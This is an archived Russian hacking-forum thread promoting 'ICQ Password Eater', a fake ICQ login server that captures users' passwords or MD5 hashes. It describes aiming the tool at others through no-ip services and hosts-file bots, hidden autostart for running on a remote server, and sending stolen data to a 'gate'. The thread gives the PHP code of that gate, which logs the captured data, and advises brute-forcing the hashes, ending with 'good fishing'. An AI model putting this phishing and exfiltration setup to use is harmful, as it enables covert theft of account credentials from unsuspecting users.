1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.

IPE - ICQ Password Eater

  1. ICQ Password Eater

    [​IMG][​IMG]

    Программа имитирует ICQ-сервер и позволяет восстановить (и не только) пароль от UIN-а, или, если производится безопасное подключение, его MD5-Hash. По сути, является неким аналогом ICQ Password Recalling от karas

    Для локального использования следует заменить в настройках клиента сервер авторизации (вместо login.icq.com ввести 127.0.0.1 или localhost) и снять галку с опции "Безопасный вход". Затем нужно запустить сервер ICQ Password Eater и нажать кнопку подключения в используемом клиенте. Пароль должен появиться в поле отчета

    В иных случаях ICQ Password Eater можно использовать вкупе с сервисами навроде no-ip.com, ну или hosts-ботами. Главное - Ваша фантазия:)
    Также программа имеет функции добавления в автозапуск и отправки полученных данных на гейт, что делает возможным скрытую работу ее на удаленном сервере (dedicated server) с прямым IP.



    Код PHP-гейта

    Код:
    <?php 
    $recieve = $_SERVER['QUERY_STRING']; 
    $file = fopen("log.txt", "a+"); 
    fwrite($file, "$recieve\r\n"); 
    fclose($file); 
    ?>
    Как восстановить пароль из MD5-хеша

    Полученный MD5-хеш можно попробовать подобрать (bruteforce) при помощи PasswordsPro Для этого нужно заполнить поля следующим образом:

    [​IMG]

    Собственно, можно посмотреть видео про отлов и подбор хеша при помощи 0x4553-Intercepter, в нашем случае непринципиальное отличие в том, что значение salt всегда постоянно и равно 100000000, ну и еще моя программа бажная, никуда я без этого)

    Всем удачной рыбалки!
     
    2 пользователям это понравилось.
  2. ......
     
  3. йзЬЬ
    Перезалейте, пожалуйста, и саму программу (ничего не извлекается), и исходный код (ссылка сдохла). Заранее спасибо!
     
  4. йзЬЬ
    Скачивается действительно нормально, только я никак не могу извлечь программу - архиваторы рапортуют об успешном извлечении, но файла так и не видно. Попробовал запустить прямо из архива Total Commander'ом - он пишет, что файл не найден.
     
  5. Параноидальность антивирусов, механизмы, используемые в программе, могут быть использованы злоумышленниками, если в двух словах.
     
  6. Радикально изменен интерфейс, добавлена возможность отправки на гейт и добавления в автозапуск с последующим скрытым запуском (для работы на дедике) + исправлено множество ошибок (но я почему-то уверен что при этом появилось множество других:()

    Протестировано на QIP 2005 8096 и некоторых мобильных клиентах. Некоторые клиенты (R&Q) при безопасном подключении шифруют пароль мало понятным мне образом, буду рад узнать как. Некоторые клиенты вообще не имеют небезопасного подключения, а в безопасном опять же..

    В общем, программа пока еще не без багов, но с вашей помощью и с появлением свободного времени/желания/возможности я буду исправлять ошибки и попробую сделать из нее конфетку)

    Подробности в первом посте
     
    1 человеку нравится это.